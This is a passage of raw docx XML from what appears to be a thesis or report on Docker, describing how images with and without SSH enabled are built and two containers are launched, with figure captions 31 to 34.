                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E62920" w14:textId="7D234EA6" w:rsidR="004C292C" w:rsidRDefault="004C292C" w:rsidP="00B8006E">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="145" w:name="_Toc86858622"/>
      <w:bookmarkStart w:id="146" w:name="_Toc86867512"/>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B8006E" w:rsidRPr="00B8006E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Dockerfile with no SSH port exposed.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="468C5A13" w14:textId="38B7183E" w:rsidR="00B12A70" w:rsidRPr="00B12A70" w:rsidRDefault="0041569C" w:rsidP="00B12A70">
      <w:r>
        <w:t xml:space="preserve">Next, the </w:t>
      </w:r>
      <w:r w:rsidR="004D1E45">
        <w:t xml:space="preserve">first image </w:t>
      </w:r>
      <w:r w:rsidR="0050242C">
        <w:t xml:space="preserve">for the SSH enabled </w:t>
      </w:r>
      <w:r w:rsidR="004D1E45">
        <w:t xml:space="preserve">is created </w:t>
      </w:r>
      <w:r w:rsidR="00DF045B">
        <w:t xml:space="preserve">using </w:t>
      </w:r>
      <w:r w:rsidR="005015A0">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00DF045B">
        <w:t>Docker commands shown in figure 32</w:t>
      </w:r>
      <w:r w:rsidR="001215C0">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D44DF6">
        <w:t xml:space="preserve"> The image is </w:t>
      </w:r>
      <w:r w:rsidR="001215C0">
        <w:t>tagged as ssh</w:t>
      </w:r>
      <w:r w:rsidR="00D44DF6">
        <w:t xml:space="preserve">_enabled </w:t>
      </w:r>
      <w:r w:rsidR="00896A24">
        <w:t>just for simplicity and clarity.</w:t>
      </w:r>
      <w:r w:rsidR="00BC4548">
        <w:t xml:space="preserve"> The Docker engine </w:t>
      </w:r>
      <w:r w:rsidR="00572C4A">
        <w:t>then creates a virtual environment (container) for the OpenSSH server</w:t>
      </w:r>
      <w:r w:rsidR="0025101C">
        <w:t xml:space="preserve"> application</w:t>
      </w:r>
      <w:r w:rsidR="00572C4A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F3ECE">
        <w:t xml:space="preserve">based on the instructions and commands </w:t>
      </w:r>
      <w:r w:rsidR="0025101C">
        <w:t>of the base image.</w:t>
      </w:r>
      <w:r w:rsidR="006B114D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0049250C">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidR="006B114D">
        <w:t>imila</w:t>
      </w:r>
      <w:r w:rsidR="0049250C">
        <w:t xml:space="preserve">rly, the second image is created </w:t>
      </w:r>
      <w:r w:rsidR="004067B9">
        <w:t xml:space="preserve">using the commands </w:t>
      </w:r>
      <w:r w:rsidR="005C0A38">
        <w:t>given in figure 33, tagged as ssh_disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997B517" w14:textId="5E1412E2" w:rsidR="004F1253" w:rsidRDefault="005527B2" w:rsidP="00BE1645">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FB3AF5B" wp14:editId="4623633F">
            <wp:extent cx="4717809" cy="2125980"/>
            <wp:effectExtent l="0" t="0" r="6985"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718610" cy="2126341"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43256169" w14:textId="251C7EB2" w:rsidR="0083675E" w:rsidRPr="009C0AC6" w:rsidRDefault="009D0D10" w:rsidP="009C0AC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="147" w:name="_Toc86858623"/>
      <w:bookmarkStart w:id="148" w:name="_Toc86867513"/>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: image created for the SSH enabled </w:t>
      </w:r>
      <w:r w:rsidR="00F95E8C" w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="147"/>
      <w:bookmarkEnd w:id="148"/>
    </w:p>
    <w:p w14:paraId="3E3A427F" w14:textId="77777777" w:rsidR="00130829" w:rsidRDefault="00130829" w:rsidP="004F1253"/>
    <w:p w14:paraId="6E82DB78" w14:textId="3652ADDB" w:rsidR="00130829" w:rsidRDefault="00130829" w:rsidP="00BE1645">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57CAEF0B" wp14:editId="6F867467">
            <wp:extent cx="4717415" cy="2510790"/>
            <wp:effectExtent l="0" t="0" r="6985"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718291" cy="2511256"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE47F88" w14:textId="0B8B7926" w:rsidR="00F95E8C" w:rsidRDefault="00F95E8C" w:rsidP="009C0AC6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="149" w:name="_Toc86858624"/>
      <w:bookmarkStart w:id="150" w:name="_Toc86867514"/>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>33</w:t>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: Docker image created for the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NO</w:t>
      </w:r>
      <w:r w:rsidR="009C0AC6" w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>N-SSH</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009C0AC6" w:rsidRPr="009C0AC6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> application.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="149"/>
      <w:bookmarkEnd w:id="150"/>
    </w:p>
    <w:p w14:paraId="13226D73" w14:textId="00343145" w:rsidR="006E128A" w:rsidRPr="006E128A" w:rsidRDefault="005002DF" w:rsidP="006E128A">
      <w:r>
        <w:t xml:space="preserve">At this stage, </w:t>
      </w:r>
      <w:r w:rsidR="004B4768">
        <w:t>the template</w:t>
      </w:r>
      <w:r w:rsidR="002C14FB">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="004B4768">
        <w:t xml:space="preserve"> to create </w:t>
      </w:r>
      <w:r w:rsidR="00F365BA">
        <w:t xml:space="preserve">an image for each application </w:t>
      </w:r>
      <w:r w:rsidR="002C14FB">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00F365BA">
        <w:t xml:space="preserve"> already created. Now, it is time to launch </w:t>
      </w:r>
      <w:r w:rsidR="001B033E">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="0017609F">
        <w:t xml:space="preserve">container for each application based on the </w:t>
      </w:r>
      <w:r w:rsidR="0062653F">
        <w:t xml:space="preserve">previously defined </w:t>
      </w:r>
      <w:r w:rsidR="0017609F">
        <w:t>images.</w:t>
      </w:r>
      <w:r w:rsidR="009222B1">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidR="007B19F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00740E95">
        <w:t>primary</w:t>
      </w:r>
      <w:r w:rsidR="007B19F8">
        <w:t xml:space="preserve"> purpose of creating containers is to </w:t>
      </w:r>
      <w:r w:rsidR="0098672D">
        <w:t xml:space="preserve">run applications in isolated environment </w:t>
      </w:r>
      <w:r w:rsidR="00C3381C">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00EA5644">
        <w:t>their</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F1A">
        <w:t xml:space="preserve"> networking and file systems</w:t>
      </w:r>
      <w:r w:rsidR="002974C5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006C1E99">
        <w:t xml:space="preserve">wholly </w:t>
      </w:r>
      <w:r w:rsidR="002974C5">
        <w:t>separated from the host</w:t>
      </w:r>
      <w:r w:rsidR="00DD2F1A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00DC3A0E">
        <w:t xml:space="preserve"> Therefore,</w:t>
      </w:r>
      <w:r w:rsidR="005F3262">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00DC3A0E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007522B9">
        <w:t>two containers are launched</w:t>
      </w:r>
      <w:r w:rsidR="00CF46D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000D4F5C">
        <w:t>according</w:t>
      </w:r>
      <w:r w:rsidR="00CF46D6">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="008515CB">
        <w:t>their base image de</w:t>
      </w:r>
      <w:r w:rsidR="00F95730">
        <w:t>fined</w:t>
      </w:r>
      <w:r w:rsidR="004F0B8C">
        <w:t>, as shown in figure 34.</w:t>
      </w:r>
      <w:r w:rsidR="00F95730">
        <w:t xml:space="preserve"> The first container is launched </w:t>
      </w:r>
      <w:r w:rsidR="00B12801">
        <w:t xml:space="preserve">based on </w:t>
      </w:r>
      <w:r w:rsidR="00A62E0B">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B12801">
        <w:t>ssh_enabled image</w:t>
      </w:r>
      <w:r w:rsidR="002F5401">
        <w:t xml:space="preserve"> and thus </w:t>
      </w:r>
      <w:r w:rsidR="004849A2">
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="002F5401">
        <w:t>es</w:t>
      </w:r>
      <w:r w:rsidR="004849A2">
        <w:t xml:space="preserve"> port 22 to the host (Ubuntu).</w:t>
      </w:r>
      <w:r w:rsidR="00ED5069">
        <w:t xml:space="preserve"> The container is also set to run in </w:t>
      </w:r>
      <w:r w:rsidR="00455F19">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00ED5069">
        <w:t xml:space="preserve">background </w:t>
      </w:r>
      <w:r w:rsidR="008C394E">
        <w:t>with</w:t>
      </w:r>
      <w:r w:rsidR="00455F19">
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="008C394E">
        <w:t xml:space="preserve"> name con_ssh.</w:t>
      </w:r>
      <w:r w:rsidR="00B406AD">
        <w:t xml:space="preserve"> The second container </w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t>run</w:t>
      </w:r>
      <w:r w:rsidR="00E000D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B406AD">
        <w:t xml:space="preserve">with </w:t>
      </w:r>
      <w:r w:rsidR="00120289">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00B406AD">
        <w:t xml:space="preserve"> name con_nossh</w:t>
      </w:r>
      <w:r w:rsidR="005B376E">
        <w:t xml:space="preserve"> created based on the</w:t>
      </w:r>
      <w:r w:rsidR="00694C2F">
        <w:t xml:space="preserve"> ssh_disabled image</w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00120289">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00435638">
        <w:t xml:space="preserve">background but </w:t>
      </w:r>
      <w:r w:rsidR="008D3B35">
        <w:t xml:space="preserve">without </w:t>
      </w:r>
      <w:r w:rsidR="00D13CEA">
        <w:t>forward</w:t>
      </w:r>
      <w:r w:rsidR="008D3B35">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00D13CEA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00246C0D">
        <w:t xml:space="preserve">its </w:t>
      </w:r>
      <w:r w:rsidR="00D13CEA">
        <w:t>port 22.</w:t>
      </w:r>
      <w:r w:rsidR="00705769">
        <w:t xml:space="preserve"> The containers are </w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t xml:space="preserve">given names just for </w:t>
      </w:r>
      <w:r w:rsidR="00E3360D">
        <w:t>simplicity</w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t xml:space="preserve"> and clarity, </w:t>
      </w:r>
      <w:r w:rsidR="004E3237">
        <w:t>al</w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t>thoug</w:t>
      </w:r>
      <w:r w:rsidR="00A65DC6">
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00970E49">
        <w:t xml:space="preserve"> to run containers without names</w:t>
      </w:r>
      <w:r w:rsidR="00A65DC6">
        <w:t xml:space="preserve"> is possible</w:t>
      </w:r>
      <w:r w:rsidR="00E3360D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004403FF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00456387">
        <w:t xml:space="preserve">Figure 34 illustrates the commands </w:t>
      </w:r>
      <w:r w:rsidR="00513CBC">
        <w:t xml:space="preserve">used to launch </w:t>
      </w:r>
      <w:r w:rsidR="00FC6149">
        <w:t xml:space="preserve">each </w:t>
      </w:r>
      <w:r w:rsidR="001E78E6">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00C90B5A">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D60F83E" w14:textId="326C6B6E" w:rsidR="00A85F0E" w:rsidRDefault="006E128A" w:rsidP="005F3262">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B8B9145" wp14:editId="127EC281">
            <wp:extent cx="5731510" cy="758825"/>
            <wp:effectExtent l="0" t="0" r="2540"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758825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="046221D9" w14:textId="0C9E86B2" w:rsidR="00420245" w:rsidRDefault="00420245" w:rsidP="007677A5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc86858625"/>
      <w:bookmarkStart w:id="152" w:name="_Toc86867515"/>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>34</w:t>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: lau</w:t>
      </w:r>
      <w:r w:rsidR="007677A5" w:rsidRPr="007677A5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nching the two containers.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
      <w:bookmarkEnd w:id="152"/>
    </w:p>
    <w:p w14:paraId="3DE46E37" w14:textId="15784D18" w:rsidR="00704061" w:rsidRDefault="00704061" w:rsidP="00704061">
      <w:r>
        <w:t xml:space="preserve">Additionally, </w:t>
      </w:r>
      <w:r w:rsidR="00D4567D">
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">alpine </w:t>
      </w:r>
      <w:r w:rsidR="004F0D46">
        <w:t>image-based</w:t>
      </w:r>
      <w:r w:rsidR="003108EB">
        <w:t xml:space="preserve"> container is created</w:t>
      </w:r>
      <w:r w:rsidR="005D6CF7">
        <w:t>, as shown in figure 35</w:t>
      </w:r>
      <w:r w:rsidR="0049047F">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004F0D46">
        <w:t xml:space="preserve"> As men</w:t>
      </w:r>
      <w:r w:rsidR="002A29CF">
        <w:t xml:space="preserve">tioned above, </w:t>
      </w:r>
      <w:r w:rsidR="006B7CE1">
        <w:t xml:space="preserve">alpine is </w:t>
      </w:r>
      <w:r w:rsidR="00876104">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00A64D0A">
        <w:t xml:space="preserve">super </w:t>
      </w:r>
      <w:r w:rsidR="006B7CE1">
        <w:t xml:space="preserve">lightweight </w:t>
      </w:r>
      <w:r w:rsidR="005A687A">
        <w:t xml:space="preserve">Linux Debian </w:t>
      </w:r>
      <w:r w:rsidR="006B7CE1">
        <w:t>image and</w:t>
      </w:r>
      <w:r w:rsidR="00C85B5E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000215D4">
        <w:t xml:space="preserve">therefore takes less time to deploy compared to </w:t>
      </w:r>
      <w:r w:rsidR="007D3DCD">
        <w:t>other base images</w:t>
      </w:r>
      <w:r w:rsidR="00A27012">
        <w:t>, like Ubuntu</w:t>
      </w:r>
      <w:r w:rsidR="00682F8B">
        <w:t>.</w:t>
      </w:r>
